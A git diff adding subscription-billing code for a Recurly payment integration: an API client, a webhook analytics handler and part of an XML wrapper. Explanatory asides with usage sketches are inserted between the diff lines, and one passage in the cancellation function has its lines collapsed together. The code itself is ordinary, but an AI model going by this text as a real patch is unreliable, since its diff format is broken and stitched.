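As an aside, a hedged sketch of calling the account lookup above; `userId` is a placeholder. A missing Recurly account is an expected case, surfaced as `null` rather than as an error.

const RecurlyClient = require('./RecurlyClient')

async function hasRecurlyAccount(userId) {
  const account = await RecurlyClient.promises.getAccountForUserId(userId)
  return account != null // null means Recurly returned NotFoundError
}
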
+    for await (const subscription of subscriptions.each()) {
+      if (result != null) {
+        throw new OError('User has more than one Recurly subscription', {
+          userId,
+        })
+      }
+      result = subscription
+    }
+    if (result == null) {
+      return null
+    }
+    return subscriptionFromApi(result)
+  } catch (err) {
+    if (err instanceof recurly.errors.NotFoundError) {
+      return null
+    } else {
+      throw err
+    }
+  }
+}
+
+/**
+ * Request a subscription change from Recurly
+ *
+ * @param {PaymentProviderSubscriptionChangeRequest} changeRequest
+ */
+async function applySubscriptionChangeRequest(changeRequest) {
+  const body = subscriptionChangeRequestToApi(changeRequest)
+
+  try {
+    const change = await client.createSubscriptionChange(
+      `uuid-${changeRequest.subscription.id}`,
+      body
+    )
+    logger.debug(
+      { subscriptionId: changeRequest.subscription.id, changeId: change.id },
+      'created subscription change'
+    )
+  } catch (err) {
+    if (err instanceof recurly.errors.ValidationError) {
+      /**
+       * @type {{params?: { param?: string }[] | null}}
+       */
+      const validationError = err
+      if (
+        validationError.params?.some(
+          p => p.param === 'subtotal_amount_in_cents'
+        )
+      ) {
+        throw new SubtotalLimitExceededError(
+          'Subtotal amount in cents exceeded error',
+          {
+            subscriptionId: changeRequest.subscription.id,
+          }
+        )
+      }
+    }
+    throw err
+  }
+}
+
+/**
+ * Preview a subscription change
+ *
+ * @param {PaymentProviderSubscriptionChangeRequest} changeRequest
+ * @return {Promise<PaymentProviderSubscriptionChange>}
+ */
+async function previewSubscriptionChange(changeRequest) {
+  const body = subscriptionChangeRequestToApi(changeRequest)
+
+  try {
+    const subscriptionChange = await client.previewSubscriptionChange(
+      `uuid-${changeRequest.subscription.id}`,
+      body
+    )
+
+    return subscriptionChangeFromApi(
+      changeRequest.subscription,
+      subscriptionChange
+    )
+  } catch (err) {
+    if (err instanceof recurly.errors.ValidationError) {
+      /**
+       * @type {{params?: { param?: string }[] | null}}
+       */
+      const validationError = err
+      if (
+        validationError.params?.some(
+          p => p.param === 'subtotal_amount_in_cents'
+        )
+      ) {
+        throw new SubtotalLimitExceededError(
+          'Subtotal amount in cents exceeded error',
+          {
+            subscriptionId: changeRequest.subscription.id,
+          }
+        )
+      }
+    }
+    throw err
+  }
+}
+
+async function removeSubscriptionChange(subscriptionId) {
+  const removed = await client.removeSubscriptionChange(subscriptionId)
+  logger.debug({ subscriptionId }, 'removed pending subscription change')
+  return removed
+}
+
+async function removeSubscriptionChangeByUuid(subscriptionUuid) {
+  return await removeSubscriptionChange('uuid-' + subscriptionUuid)
+}
+
+async function reactivateSubscriptionByUuid(subscriptionUuid) {
+  return await client.reactivateSubscription('uuid-' + subscriptionUuid)
+}
+
+async function cancelSubscriptionByUuid(subscriptionUuid) {
+  try {
+    return await client.cancelSubscription('uuid-' + subscriptionUuid)
+  } catch (err) {
+    if (err instanceof recurly.errors.ValidationError) {
+      if (
+        err.message === 'Only active and future subscriptions can be canceled.' 
+ ) { + logger.debug( + { subscriptionUuid }, + 'subscription cancellation failed, subscription not active' + ) + } + } else { + throw err + } + } +} + +async function pauseSubscriptionByUuid(subscriptionUuid, pauseCycles) { + return await client.pauseSubscription('uuid-' + subscriptionUuid, { + remainingPauseCycles: pauseCycles, + }) +} + +async function resumeSubscriptionByUuid(subscriptionUuid) { + return await client.resumeSubscription('uuid-' + subscriptionUuid) +} + +/** + * Get the payment method for the given user + * + * @param {string} userId + * @return {Promise<PaymentMethod>} + */ +async function getPaymentMethod(userId) { + let billingInfo + + try { + billingInfo = await client.getBillingInfo(`code-${userId}`) + } catch (error) { + if (error instanceof recurly.errors.NotFoundError) { + throw new MissingBillingInfoError('This account has no billing info', { + userId, + }) + } + throw error + } + + return paymentMethodFromApi(billingInfo) +} + +/** + * Get the configuration for a given add-on + * + * @param {string} planCode + * @param {string} addOnCode + * @return {Promise<PaymentProviderAddOn>} + */ +async function getAddOn(planCode, addOnCode) { + const addOn = await client.getPlanAddOn( + `code-${planCode}`, + `code-${addOnCode}` + ) + return addOnFromApi(addOn) +} + +/** + * Get the configuration for a given plan + * + * @param {string} planCode + * @return {Promise<PaymentProviderPlan>} + */ +async function getPlan(planCode) { + const plan = await client.getPlan(`code-${planCode}`) + return planFromApi(plan) +} + +function subscriptionIsCanceledOrExpired(subscription) { + const state = subscription?.recurlyStatus?.state + return state === 'canceled' || state === 'expired' +} + +/** + * Build a PaymentProviderAccount from Recurly API data + * + * @param {recurly.Account} apiAccount + * @return {PaymentProviderAccount} + */ +function accountFromApi(apiAccount) { + if (apiAccount.code == null || apiAccount.email == null) { + throw new OError('Invalid Recurly account', { + account: apiAccount, + }) + } + return new PaymentProviderAccount({ + code: apiAccount.code, + email: apiAccount.email, + hasPastDueInvoice: apiAccount.hasPastDueInvoice ?? false, + }) +} + +/** + * Build a PaymentProviderCoupon from Recurly API data + * + * @param {recurly.CouponRedemption} apiRedemption + * @return {PaymentProviderCoupon} + */ +function couponFromApi(apiRedemption) { + if (apiRedemption.coupon == null || apiRedemption.coupon.code == null) { + throw new OError('Invalid Recurly coupon', { + coupon: apiRedemption, + }) + } + return new PaymentProviderCoupon({ + code: apiRedemption.coupon.code, + name: apiRedemption.coupon.name ?? '', + description: apiRedemption.coupon.hostedPageDescription ?? 
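
Illustrative handling of the `MissingBillingInfoError` thrown by `getPaymentMethod` above (a sketch, not from the diff); `userId` is a placeholder.

const { MissingBillingInfoError } = require('./Errors')
const RecurlyClient = require('./RecurlyClient')

async function describePaymentMethod(userId) {
  try {
    const paymentMethod = await RecurlyClient.promises.getPaymentMethod(userId)
    return paymentMethod.toString() // e.g. 'Visa **** 1234' or 'Paypal'
  } catch (err) {
    if (err instanceof MissingBillingInfoError) {
      return null // account exists but has no billing info on file
    }
    throw err
  }
}
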
'', + }) +} + +/** + * Build a PaymentProviderSubscription from Recurly API data + * + * @param {recurly.Subscription} apiSubscription + * @return {PaymentProviderSubscription} + */ +function subscriptionFromApi(apiSubscription) { + if ( + apiSubscription.uuid == null || + apiSubscription.plan == null || + apiSubscription.plan.code == null || + apiSubscription.plan.name == null || + apiSubscription.account == null || + apiSubscription.account.code == null || + apiSubscription.unitAmount == null || + apiSubscription.subtotal == null || + apiSubscription.total == null || + apiSubscription.currency == null || + apiSubscription.currentPeriodStartedAt == null || + apiSubscription.currentPeriodEndsAt == null || + apiSubscription.collectionMethod == null + ) { + throw new OError('Invalid Recurly subscription', { + subscription: apiSubscription, + }) + } + + const subscription = new PaymentProviderSubscription({ + id: apiSubscription.uuid, + userId: apiSubscription.account.code, + planCode: apiSubscription.plan.code, + planName: apiSubscription.plan.name, + planPrice: apiSubscription.unitAmount, + addOns: (apiSubscription.addOns ?? []).map(subscriptionAddOnFromApi), + subtotal: apiSubscription.subtotal, + taxRate: apiSubscription.taxInfo?.rate ?? 0, + taxAmount: apiSubscription.tax ?? 0, + total: apiSubscription.total, + currency: apiSubscription.currency, + periodStart: apiSubscription.currentPeriodStartedAt, + periodEnd: apiSubscription.currentPeriodEndsAt, + collectionMethod: apiSubscription.collectionMethod, + service: 'recurly', + state: apiSubscription.state ?? 'active', + trialPeriodEnd: apiSubscription.trialEndsAt, + pausePeriodStart: apiSubscription.pausedAt, + remainingPauseCycles: apiSubscription.remainingPauseCycles, + }) + + if (apiSubscription.pendingChange != null) { + subscription.pendingChange = subscriptionChangeFromApi( + subscription, + apiSubscription.pendingChange + ) + } + + return subscription +} + +/** + * Build a PaymentProviderSubscriptionAddOn from Recurly API data + * + * @param {recurly.SubscriptionAddOn} addOn + * @return {PaymentProviderSubscriptionAddOn} + */ +function subscriptionAddOnFromApi(addOn) { + if ( + addOn.addOn == null || + addOn.addOn.code == null || + addOn.addOn.name == null || + addOn.unitAmount == null + ) { + throw new OError('Invalid Recurly add-on', { addOn }) + } + + return new PaymentProviderSubscriptionAddOn({ + code: addOn.addOn.code, + name: addOn.addOn.name, + quantity: addOn.quantity ?? 1, + unitPrice: addOn.unitAmount, + }) +} + +/** + * Build a PaymentProviderSubscriptionChange from Recurly API data + * + * @param {PaymentProviderSubscription} subscription - the current subscription + * @param {recurly.SubscriptionChange} subscriptionChange - the subscription change returned from the API + * @return {PaymentProviderSubscriptionChange} + */ +function subscriptionChangeFromApi(subscription, subscriptionChange) { + if ( + subscriptionChange.plan == null || + subscriptionChange.plan.code == null || + subscriptionChange.plan.name == null || + subscriptionChange.unitAmount == null + ) { + throw new OError('Invalid Recurly subscription change', { + subscriptionChange, + }) + } + const nextAddOns = (subscriptionChange.addOns ?? 
[]).map(
+    subscriptionAddOnFromApi
+  )
+
+  return new PaymentProviderSubscriptionChange({
+    subscription,
+    nextPlanCode: subscriptionChange.plan.code,
+    nextPlanName: subscriptionChange.plan.name,
+    nextPlanPrice: subscriptionChange.unitAmount,
+    nextAddOns,
+    immediateCharge: computeImmediateCharge(subscriptionChange),
+  })
+}
+
+/**
+ * Compute immediate charge based on invoice collection
+ *
+ * @param {recurly.SubscriptionChange} subscriptionChange - the subscription change returned from the API
+ * @return {PaymentProviderImmediateCharge}
+ */
+function computeImmediateCharge(subscriptionChange) {
+  const roundToTwoDecimal = (/** @type {number} */ num) =>
+    Math.round(num * 100) / 100
+  let subtotal =
+    subscriptionChange.invoiceCollection?.chargeInvoice?.subtotal ?? 0
+  let tax = subscriptionChange.invoiceCollection?.chargeInvoice?.tax ?? 0
+  let total = subscriptionChange.invoiceCollection?.chargeInvoice?.total ?? 0
+  let discount =
+    subscriptionChange.invoiceCollection?.chargeInvoice?.discount ?? 0
+  for (const creditInvoice of subscriptionChange.invoiceCollection
+    ?.creditInvoices ?? []) {
+    // The credit invoice numbers are already negative
+    subtotal = roundToTwoDecimal(subtotal + (creditInvoice.subtotal ?? 0))
+    total = roundToTwoDecimal(total + (creditInvoice.total ?? 0))
+    // Tax rate can be different in credit invoice if a user relocates
+    tax = roundToTwoDecimal(tax + (creditInvoice.tax ?? 0))
+    discount = roundToTwoDecimal(discount + (creditInvoice.discount ?? 0))
+  }
+  return new PaymentProviderImmediateCharge({
+    subtotal,
+    total,
+    tax,
+    discount,
+  })
+}
+
+/**
+ * Returns a payment method from Recurly API data
+ *
+ * @param {recurly.BillingInfo} billingInfo
+ * @return {PaymentMethod}
+ */
+function paymentMethodFromApi(billingInfo) {
+  if (billingInfo.paymentMethod == null) {
+    throw new OError('Invalid Recurly billing info', { billingInfo })
+  }
+  const paymentMethod = billingInfo.paymentMethod
+
+  if (paymentMethod.billingAgreementId != null) {
+    return new PaypalPaymentMethod()
+  }
+
+  if (paymentMethod.cardType == null || paymentMethod.lastFour == null) {
+    throw new OError('Invalid Recurly billing info', { billingInfo })
+  }
+  return new CreditCardPaymentMethod({
+    cardType: paymentMethod.cardType,
+    lastFour: paymentMethod.lastFour,
+  })
+}
+
+/**
+ * Build a PaymentProviderAddOn from Recurly API data
+ *
+ * @param {recurly.AddOn} addOn
+ * @return {PaymentProviderAddOn}
+ */
+function addOnFromApi(addOn) {
+  if (addOn.code == null || addOn.name == null) {
+    throw new OError('Invalid Recurly add-on', { addOn })
+  }
+  return new PaymentProviderAddOn({
+    code: addOn.code,
+    name: addOn.name,
+  })
+}
+
+/**
+ * Build a PaymentProviderPlan from Recurly API data
+ *
+ * @param {recurly.Plan} plan
+ * @return {PaymentProviderPlan}
+ */
+function planFromApi(plan) {
+  if (plan.code == null || plan.name == null) {
+    throw new OError('Invalid Recurly plan', { plan })
+  }
+  return new PaymentProviderPlan({
+    code: plan.code,
+    name: plan.name,
+  })
+}
+
+/**
+ * Build an API request from a PaymentProviderSubscriptionChangeRequest
+ *
+ * @param {PaymentProviderSubscriptionChangeRequest} changeRequest
+ * @return {recurly.SubscriptionChangeCreate}
+ */
+function subscriptionChangeRequestToApi(changeRequest) {
+  /** @type {recurly.SubscriptionChangeCreate} */
+  const requestBody = {
+    timeframe: changeRequest.timeframe,
+  }
+  if (changeRequest.planCode != null) {
+    requestBody.planCode = changeRequest.planCode
+  }
+  if (changeRequest.addOnUpdates != null) {
+    
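
Made-up numbers showing how `computeImmediateCharge` above nets credit invoices (whose amounts are already negative) against the charge invoice:

const charge = { subtotal: 30.0, tax: 6.0, total: 36.0, discount: 0 }
const credit = { subtotal: -10.0, tax: -2.0, total: -12.0, discount: 0 }

const round = n => Math.round(n * 100) / 100
const immediate = {
  subtotal: round(charge.subtotal + credit.subtotal), // 20
  tax: round(charge.tax + credit.tax), // 4
  total: round(charge.total + credit.total), // 24
  discount: round(charge.discount + credit.discount), // 0
}
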
requestBody.addOns = changeRequest.addOnUpdates.map(addOnUpdate => { + /** @type {recurly.SubscriptionAddOnUpdate} */ + const update = { code: addOnUpdate.code } + if (addOnUpdate.quantity != null) { + update.quantity = addOnUpdate.quantity + } + if (addOnUpdate.unitPrice != null) { + update.unitAmount = addOnUpdate.unitPrice + } + return update + }) + } + return requestBody +} + +module.exports = { + errors: recurly.errors, + + getAccountForUserId: callbackify(getAccountForUserId), + createAccountForUserId: callbackify(createAccountForUserId), + getActiveCouponsForUserId: callbackify(getActiveCouponsForUserId), + getSubscription: callbackify(getSubscription), + getSubscriptionForUser: callbackify(getSubscriptionForUser), + previewSubscriptionChange: callbackify(previewSubscriptionChange), + applySubscriptionChangeRequest: callbackify(applySubscriptionChangeRequest), + removeSubscriptionChange: callbackify(removeSubscriptionChange), + removeSubscriptionChangeByUuid: callbackify(removeSubscriptionChangeByUuid), + reactivateSubscriptionByUuid: callbackify(reactivateSubscriptionByUuid), + cancelSubscriptionByUuid: callbackify(cancelSubscriptionByUuid), + getPaymentMethod: callbackify(getPaymentMethod), + getAddOn: callbackify(getAddOn), + getPlan: callbackify(getPlan), + subscriptionIsCanceledOrExpired, + pauseSubscriptionByUuid: callbackify(pauseSubscriptionByUuid), + resumeSubscriptionByUuid: callbackify(resumeSubscriptionByUuid), + + promises: { + getSubscription, + getSubscriptionForUser, + getAccountForUserId, + createAccountForUserId, + getActiveCouponsForUserId, + previewSubscriptionChange, + applySubscriptionChangeRequest, + removeSubscriptionChange, + removeSubscriptionChangeByUuid, + reactivateSubscriptionByUuid, + cancelSubscriptionByUuid, + pauseSubscriptionByUuid, + resumeSubscriptionByUuid, + getPaymentMethod, + getAddOn, + getPlan, + }, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyEventHandler.js b/services/web/app/src/Features/Subscription/RecurlyEventHandler.js new file mode 100644 index 0000000..d97d57e --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyEventHandler.js @@ -0,0 +1,365 @@ +const SplitTestHandler = require('../SplitTests/SplitTestHandler') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const SubscriptionEmailHandler = require('./SubscriptionEmailHandler') +const { AI_ADD_ON_CODE } = require('./PaymentProviderEntities') +const { ObjectId } = require('mongodb-legacy') + +const INVOICE_SUBSCRIPTION_LIMIT = 10 + +async function sendRecurlyAnalyticsEvent(event, eventData) { + const userId = _getUserId(eventData) + if (!ObjectId.isValid(userId)) { + return + } + + switch (event) { + case 'new_subscription_notification': + await _sendSubscriptionStartedEvent(userId, eventData) + break + case 'updated_subscription_notification': + await _sendSubscriptionUpdatedEvent(userId, eventData) + break + case 'canceled_subscription_notification': + await _sendSubscriptionCancelledEvent(userId, eventData) + break + case 'expired_subscription_notification': + await _sendSubscriptionExpiredEvent(userId, eventData) + break + case 'renewed_subscription_notification': + await _sendSubscriptionRenewedEvent(userId, eventData) + break + case 'reactivated_account_notification': + await _sendSubscriptionReactivatedEvent(userId, eventData) + break + case 'subscription_paused_notification': + await _sendSubscriptionPausedEvent(userId, eventData) + break + case 'subscription_resumed_notification': + // 'resumed' here means resumed 
from pause + await _sendSubscriptionResumedEvent(userId, eventData) + break + case 'paid_charge_invoice_notification': + if ( + eventData.invoice.state === 'paid' && + eventData.invoice.total_in_cents > 0 + ) { + await _sendInvoicePaidEvent(userId, eventData) + } + break + case 'closed_invoice_notification': + if ( + eventData.invoice.state === 'collected' && + eventData.invoice.total_in_cents > 0 + ) { + await _sendInvoicePaidEvent(userId, eventData) + } + break + } +} + +async function _sendSubscriptionResumedEvent(userId, eventData) { + const { planCode, state, subscriptionId } = _getSubscriptionData(eventData) + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-resumed', + { + plan_code: planCode, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) +} + +async function _sendSubscriptionPausedEvent(userId, eventData) { + const { planCode, state, subscriptionId } = _getSubscriptionData(eventData) + + const pauseLength = eventData.subscription.remaining_pause_cycles + + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-paused', + { + pause_length: pauseLength, + plan_code: planCode, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) +} + +async function _sendSubscriptionStartedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-started', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) + + if (isTrial) { + await SubscriptionEmailHandler.sendTrialOnboardingEmail(userId, planCode) + const cioAssignment = await SplitTestHandler.promises.getAssignmentForUser( + userId, + 'customer-io-trial-conversion' + ) + if (cioAssignment.variant === 'enabled') { + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'customer-io-integration', + true + ) + } + } +} + +async function _sendSubscriptionUpdatedEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-updated', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-plan-code', + planCode + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-state', + state + ) + AnalyticsManager.setUserPropertyForUserInBackground( + userId, + 'subscription-is-trial', + isTrial + ) +} + +async function _sendSubscriptionCancelledEvent(userId, eventData) { + const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } = + _getSubscriptionData(eventData) + AnalyticsManager.recordEventForUserInBackground( + userId, + 'subscription-cancelled', + { + plan_code: planCode, + quantity, + is_trial: isTrial, + has_ai_add_on: hasAiAddOn, + subscriptionId, + } + ) + 
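
A sketch of how a parsed Recurly webhook might be fed into `sendRecurlyAnalyticsEvent` above. The event name and payload shape follow the cases in the switch; the concrete values are invented for illustration.

const RecurlyEventHandler = require('./RecurlyEventHandler')

async function handleWebhook(userId) {
  await RecurlyEventHandler.sendRecurlyAnalyticsEvent(
    'renewed_subscription_notification',
    {
      account: { account_code: userId }, // must be a valid ObjectId string
      subscription: {
        uuid: 'hypothetical-uuid',
        plan: { plan_code: 'collaborator' },
        quantity: 1,
        state: 'active',
      },
    }
  )
}
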
AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-state',
+    state
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-is-trial',
+    isTrial
+  )
+}
+
+async function _sendSubscriptionExpiredEvent(userId, eventData) {
+  const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } =
+    _getSubscriptionData(eventData)
+  AnalyticsManager.recordEventForUserInBackground(
+    userId,
+    'subscription-expired',
+    {
+      plan_code: planCode,
+      quantity,
+      is_trial: isTrial,
+      has_ai_add_on: hasAiAddOn,
+      subscriptionId,
+    }
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-plan-code',
+    planCode
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-state',
+    state
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-is-trial',
+    isTrial
+  )
+}
+
+async function _sendSubscriptionRenewedEvent(userId, eventData) {
+  const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } =
+    _getSubscriptionData(eventData)
+  AnalyticsManager.recordEventForUserInBackground(
+    userId,
+    'subscription-renewed',
+    {
+      plan_code: planCode,
+      quantity,
+      is_trial: isTrial,
+      has_ai_add_on: hasAiAddOn,
+      subscriptionId,
+    }
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-plan-code',
+    planCode
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-state',
+    state
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-is-trial',
+    isTrial
+  )
+}
+
+async function _sendSubscriptionReactivatedEvent(userId, eventData) {
+  const { planCode, quantity, state, isTrial, hasAiAddOn, subscriptionId } =
+    _getSubscriptionData(eventData)
+  AnalyticsManager.recordEventForUserInBackground(
+    userId,
+    'subscription-reactivated',
+    {
+      plan_code: planCode,
+      quantity,
+      has_ai_add_on: hasAiAddOn,
+      subscriptionId,
+    }
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-plan-code',
+    planCode
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-state',
+    state
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-is-trial',
+    isTrial
+  )
+}
+
+async function _sendInvoicePaidEvent(userId, eventData) {
+  const invoice = eventData.invoice
+  if (!invoice) {
+    return
+  }
+  const invoiceNumber = invoice.invoice_number
+  const currency = invoice.currency
+  const totalInCents = invoice.total_in_cents
+  const taxInCents = invoice.tax_in_cents
+  const country = invoice.address?.country
+  const collectionMethod = invoice.collection_method
+  const subscriptionIds = {}
+  invoice.subscription_ids?.forEach((e, idx) => {
+    if (idx < INVOICE_SUBSCRIPTION_LIMIT) {
+      subscriptionIds[`subscriptionId${idx + 1}`] = e
+    }
+  })
+  AnalyticsManager.recordEventForUserInBackground(
+    userId,
+    'subscription-invoice-collected',
+    {
+      invoiceNumber,
+      currency,
+      totalInCents,
+      taxInCents,
+      country,
+      collectionMethod,
+      ...subscriptionIds,
+    }
+  )
+  AnalyticsManager.setUserPropertyForUserInBackground(
+    userId,
+    'subscription-is-trial',
+    false
+  )
+}
+
+function _getUserId(eventData) {
+  let userId
+  if (eventData && eventData.account && eventData.account.account_code) {
+    userId = eventData.account.account_code
+  } else {
+    throw new Error(
+      'account.account_code missing in event data to identify user ID'
+    )
+  }
+  return userId
+}
+
+function _getSubscriptionData(eventData) {
+  const isTrial =
+    
eventData.subscription.trial_started_at && + eventData.subscription.current_period_started_at && + eventData.subscription.trial_started_at.getTime() === + eventData.subscription.current_period_started_at.getTime() + const hasAiAddOn = + eventData.subscription.subscription_add_ons?.some( + addOn => addOn.add_on_code === AI_ADD_ON_CODE + ) ?? false + return { + planCode: eventData.subscription.plan.plan_code, + quantity: eventData.subscription.quantity, + state: eventData.subscription.state, + subscriptionId: eventData.subscription.uuid, + isTrial, + hasAiAddOn, + } +} + +module.exports = { + sendRecurlyAnalyticsEvent, +} diff --git a/services/web/app/src/Features/Subscription/RecurlyWrapper.js b/services/web/app/src/Features/Subscription/RecurlyWrapper.js new file mode 100644 index 0000000..2227597 --- /dev/null +++ b/services/web/app/src/Features/Subscription/RecurlyWrapper.js @@ -0,0 +1,968 @@ +const OError = require('@overleaf/o-error') +const { + fetchStringWithResponse, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const Settings = require('@overleaf/settings') +const xml2js = require('xml2js') +const logger = require('@overleaf/logger') +const Errors = require('../Errors/Errors') +const SubscriptionErrors = require('./Errors') +const { callbackify } = require('@overleaf/promise-utils') + +/** + * @param accountId + * @param newEmail + */ +async function updateAccountEmailAddress(accountId, newEmail) { + const data = { + email: newEmail, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('account', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { accountId, newEmail }) + } + + const { body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountId}`, + method: 'PUT', + body: requestBody, + }) + return await RecurlyWrapper.promises._parseAccountXml(body) +} + +const promises = { + _paypal: { + async checkAccountExists(cache) { + const { user } = cache + logger.debug( + { userId: user._id }, + 'checking if recurly account exists for user' + ) + let response, body + try { + ;({ response, body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${user._id}`, + method: 'GET', + expect404: true, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while checking account', + { + user_id: user._id, + } + ) + throw error + } + if (response.status === 404) { + // actually not an error in this case, just no existing account + logger.debug( + { userId: user._id }, + 'user does not currently exist in recurly, proceed' + ) + cache.userExists = false + return cache + } + logger.debug({ userId: user._id }, 'user appears to exist in recurly') + try { + const account = await RecurlyWrapper.promises._parseAccountXml(body) + cache.userExists = true + cache.account = account + return cache + } catch (err) { + OError.tag(err, 'error parsing account', { + user_id: user._id, + }) + throw err + } + }, + async createAccount(cache) { + const { user } = cache + const { subscriptionDetails } = cache + if (cache.userExists) { + return cache + } + + const address = getAddressFromSubscriptionDetails( + subscriptionDetails, + false + ) + + const data = { + account_code: user._id, + email: user.email, + first_name: user.first_name, + last_name: user.last_name, + address, + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('account', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + let body + try { + ;({ body } = await 
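
One detail worth spelling out from `_getSubscriptionData` above: a subscription is treated as a trial when the trial and the current billing period started at the same instant. A sketch with made-up dates:

const trialStartedAt = new Date('2025-04-01T00:00:00Z')
const currentPeriodStartedAt = new Date('2025-04-01T00:00:00Z')

const isTrial =
  Boolean(trialStartedAt) &&
  Boolean(currentPeriodStartedAt) &&
  trialStartedAt.getTime() === currentPeriodStartedAt.getTime() // true
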
RecurlyWrapper.promises.apiRequest({ + url: 'accounts', + method: 'POST', + body: requestBody, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while creating account', + { user_id: user._id } + ) + throw error + } + try { + cache.account = await RecurlyWrapper.promises._parseAccountXml(body) + return cache + } catch (err) { + OError.tag(err, 'error creating account', { + user_id: user._id, + }) + throw err + } + }, + async createBillingInfo(cache) { + const { user } = cache + const { recurlyTokenIds } = cache + logger.debug({ userId: user._id }, 'creating billing info in recurly') + const accountCode = cache?.account?.account_code + if (!accountCode) { + throw new Error('no account code at createBillingInfo stage') + } + const data = { token_id: recurlyTokenIds.billing } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('billing_info', data) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountCode}/billing_info`, + method: 'POST', + body: requestBody, + })) + } catch (error) { + OError.tag( + error, + 'error response from recurly while creating billing info', + { user_id: user._id } + ) + throw error + } + try { + cache.billingInfo = + await RecurlyWrapper.promises._parseBillingInfoXml(body) + return cache + } catch (err) { + OError.tag(err, 'error creating billing info', { + user_id: user._id, + accountCode, + }) + throw err + } + }, + + async setAddressAndCompanyBillingInfo(cache) { + const { user } = cache + const { subscriptionDetails } = cache + logger.debug( + { userId: user._id }, + 'setting billing address and company info in recurly' + ) + const accountCode = cache?.account?.account_code + if (!accountCode) { + throw new Error( + 'no account code at setAddressAndCompanyBillingInfo stage' + ) + } + + const addressAndCompanyBillingInfo = getAddressFromSubscriptionDetails( + subscriptionDetails, + true + ) + + let requestBody + try { + requestBody = RecurlyWrapper._buildXml( + 'billing_info', + addressAndCompanyBillingInfo + ) + } catch (error) { + throw OError.tag(error, 'error building xml', { user_id: user._id }) + } + + let body + try { + ;({ body } = await RecurlyWrapper.promises.apiRequest({ + url: `accounts/${accountCode}/billing_info`, + method: 'PUT', + body: requestBody, + })) + } catch (error) { + OError.tag(error, 'error response from recurly while setting address', { + user_id: user._id, + }) + throw error + } + try { + cache.billingInfo = + await RecurlyWrapper.promises._parseBillingInfoXml(body) + return cache + } catch (err) { + if (err) { + OError.tag(err, 'error updating billing info', { + user_id: user._id, + }) + throw err + } + } + }, + async createSubscription(cache) { + const { user } = cache + const { subscriptionDetails } = cache + logger.debug({ userId: user._id }, 'creating subscription in recurly') + const data = { + plan_code: subscriptionDetails.plan_code, + currency: subscriptionDetails.currencyCode, + coupon_code: subscriptionDetails.coupon_code, + account: { + account_code: user._id, + }, + } + if (subscriptionDetails.subscription_add_ons) { + data.subscription_add_ons = subscriptionDetails.subscription_add_ons + } + const customFields = + getCustomFieldsFromSubscriptionDetails(subscriptionDetails) + if (customFields) { + data.custom_fields = customFields + } + let requestBody + try { + requestBody = RecurlyWrapper._buildXml('subscription', data) + } catch 
(error) {
+        throw OError.tag(error, 'error building xml', { user_id: user._id })
+      }
+
+      let body
+      try {
+        ;({ body } = await RecurlyWrapper.promises.apiRequest({
+          url: 'subscriptions',
+          method: 'POST',
+          body: requestBody,
+        }))
+      } catch (error) {
+        OError.tag(
+          error,
+          'error response from recurly while creating subscription',
+          { user_id: user._id }
+        )
+        throw error
+      }
+      try {
+        cache.subscription =
+          await RecurlyWrapper.promises._parseSubscriptionXml(body)
+        return cache
+      } catch (err) {
+        OError.tag(err, 'error creating subscription', {
+          user_id: user._id,
+        })
+        throw err
+      }
+    },
+  },
+
